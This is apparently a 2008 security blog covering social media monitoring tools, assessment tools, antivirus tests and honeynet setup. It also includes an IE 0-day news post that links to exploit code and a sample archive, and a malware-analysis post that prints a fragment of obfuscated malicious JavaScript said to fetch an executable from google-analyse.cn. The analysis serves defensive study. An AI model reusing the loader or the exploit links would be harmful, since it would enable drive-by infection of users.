Monday, December 29, 2008

Monitoring Social Media

Web search has lots of power when it comes to Social Media monitoring, there are lots of free tools and search engines that can help you in that area. Combine the search results with rss feed, and you will get an easy way for tracking the social media. This can be very useful in watch-and-warning teams and security monitoring activities.

Monitor blogs, comments, news, tags, forums,...

Social Mention(blogs,comments)
Boardtracker (forums)
Yacktrack (comments on defined URL)
Backtype (comments, people)
Technorati (blogs):
Google Alert (web, news, ..)
Startpr (blogs, photos, videos, social networks)
Omgili (forums)
Serph (forums, social networks, blogs, news,...)
Keotag (tags)

Twitter (social messages)

Search for People:


Twitter Monitor


Tattler, Open Source Topic Monitoring Tool

Other tools:
Updated:
A comprehensive list is now available on http://wiki.kenburbary.com/social-meda-monitoring-wiki/

Wednesday, December 17, 2008

Free Security Assessment Tools

Security System Analyzer :
OVAL-compatible product
Fully support of open security standards and initiatives (CVE, OVAL, CCE, CPE, CWE, CAPEC, CVSS, CRF)
Perform a deep inventory audit on installed software and applications
Scan and map vulnerabilities using non-intrusive techniques based on schemas
Detect and identify missed patches and hotfixes
Define a patch management deployment strategy using CVSS scores
MS Baseline Security Analyzer:
Vulnerability assessment scan tool for MS products


Secunia Personal Software Inspector:
Scan all the software installed on your PC, and advise you to update un-patched software.
http://secunia.com/vulnerability_scanning/personal/


Microsoft Security Assessment Tool:
MSAT consists of over 200 questions covering infrastructure, applications, operations, and people.
The questions and the recommendations that the tool offers are based on standards such as ISO 17799 and NIST-800.x, MS trustworth computing group and other external resources.

http://technet.microsoft.com/en-us/security/cc185712.aspx

Application Pen-Testing time Estimator:



Sunday, December 14, 2008

Anti-Virus Comparison

There is always a debate about these kind of tests, but these 2 reports worth reading.

According to the av-comparatives AVIRA and ESET NOD32 are the best engines in terms of detection rates and overall performance.
http://www.av-comparatives.org/seiten/ergebnisse/summary2008.pdf


In a different report, AVIRA also scored higher than others
http://www.anti-malware-test.com/?q=node/39

Exploits archives

When doing pen-testing, the below sites are good enough for getting the exploits you may need:

Saturday, December 13, 2008

Virtual honeynet, network setup

I have seen lots of questions about networking a virtual honeynet, here is my setup.
I am using a host machine with 3 VMs: Honeywall, Honeypot, and a management station.
The IPs on the diagram are based on a test setup, the honeypot IP should be changed to a real IP if it will be placed on the internet, no more changes are needed (in terms of IPs).


Wednesday, December 10, 2008

Fully patched Internet Explorer is Vulnerable, 0-Day again...

A remote exploit targeting fully patched IE (several versions) is available in the wild, the vulnerability is rated as critical.
VeriSign's iDefense security division reports that attack code was up for sale at prices of up to $15,000 through underground forums.


The exploit is available on http://milw0rm.com/exploits/7403
Real example of the exploit: http://milw0rm.com/sploits/2008-iesploit.tar.gz

Analysis by HD Moore:

Microsoft Official Advisory:

Snort Signatures:

List of sites exploiting this vulnrability:

Workaround:

The exploit is spreading:

The big picture:
Hackers are using mass SQL-Injection attacks to infect legitimate sites with malicious IFrame and JavaScript that may redirect the user to a malicious site with the IE exploit, so visitors to those trusted sites will be infected, the exploit will drop different flavors of malware on the client PC.

Friday, December 5, 2008

MessageLabs Annual Security Report

- 90% of SPAM is coming from Botnets
- Complex web-based malware became widespread, resulting in malware being installed onto computers with no user interaction
-Targeted trojan attacks  rose in 2008
- The usage of online free file sharing services helped the spammers to upload and share malicious files using just a link, this file could be a small html page, with a Javascript  that redirect the victim to the spammer's website
- Also free webhosting services are being used inceasingly by spammers to host spam content 

check the report:

Monday, December 1, 2008

Web Based Malware Analysis

Working on a Javascript malware analysis, here are some useful tools that can help:
Rhino
http://www.mozilla.org/rhino/
Malzilla
http://malzilla.sourceforge.net/
Caffeine monkey
http://www.mozilla.org/js/spidermonkey/
FreShow
http://www.jimmyleo.com/work/FreShowStart.htm
DecryptJS:
http://www.ukhoneynet.org/tools/decrypt-js/


I came across this malicious JavaScript
AAA=Array(63/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,42/**/,0/**/,22/**/,32/**/,47/**/,40/**/,50/**/,56/**/,60/**/,11/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,54/**/,8/**/,27/**/,45/**/,43/**/,58/**/,41/**/,31/**/,26/**/,2/**/,4/**/,17/**/,59/**/,44/**/,20/**/,28/**/,18/**/,19/**/,16/**/,52/**/,46/**/,61/**/,33/**/,39/**/,15/**/,14/**/,9/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,13/**/,23/**/,3/**/,25/**/,55/**/,10/**/,38/**/,62/**/,7/**/,24/**/,51/**/,29/**/,12/**/,5/**/,6/**/,35/**/,37/**/,48/**/,1/**/,36/**/,21/**/,57/**/,34/**/,53/**/,49/**/,30)
BBB="I7bHEVPGEK2a41oG8VWmWO6BWl@Btx2ZFd2HtnWO .. .. . . . . . ."
CCC=3536,DDD,EEE,FFF=''
YYY=ZZZ=XXX=0
for(EEE=4;EEE>0;EEE--)
{for(DDD=Math.min(CCC,1024);DDD>0;DDD--,CCC--)
{eval('XXX|=(AAA[BBB.charCodeAt(YYY++)-33]) < <
ZZZ;');

Here are my notes:
- AAA variable is used as a key for encoding, if the attacker needs to change the code, he will just change the encoding key, this will help in the AV evading.
-
String.fromCha'+'rCode(8^XXX&255) means String.fromCharCode(8^XXX&255)
-
BBB.charCodeAt(YYY++)
this will get the
unicode value of BBB character by character, starting form character 0-1024
- let us take the first part:
I7bHEVPGEK2a41oG8VWmWO6BWl@
starting with position 0 increment by 1:
I7bHEVPGEK2a41oG8VWmWO6BWl@ ==> 73 55 98 72 69 86 80 71 69 75 50 97 52 49 111 71 56 86 87 109 87 79 54 66 87 108 64
deduct 33 from them all: 40 22 65 39 36 53 47 38 36 42 17 64 19 16 78 38 23 53 54 76 54 46 21 33 54 75 31


so look at a overall equation:
'XXX|=(AAA[BBB.charCodeAt(YYY++)-33]) < <>
"|" is bitwise OR, "<<" is shift left
- The code use bitwise OR and Shift Left for encoding
- There is an easier way to do this by using
Malzilla, and the debug feature.
- Finally the code will try to connect to google-analyse.
cn, and downloading a malicious executable file.


References:
http://rishida.net/scripts/uniview/conversion.php
http://www.eecs.umich.edu/~bartlett/jsops.html http://doc.sumy.ua/prog/jsm/ch13.htm#BitwiseOROperator
http://www.ukhoneynet.org/wp-content/uploads/2007/08/decryptjs.tgz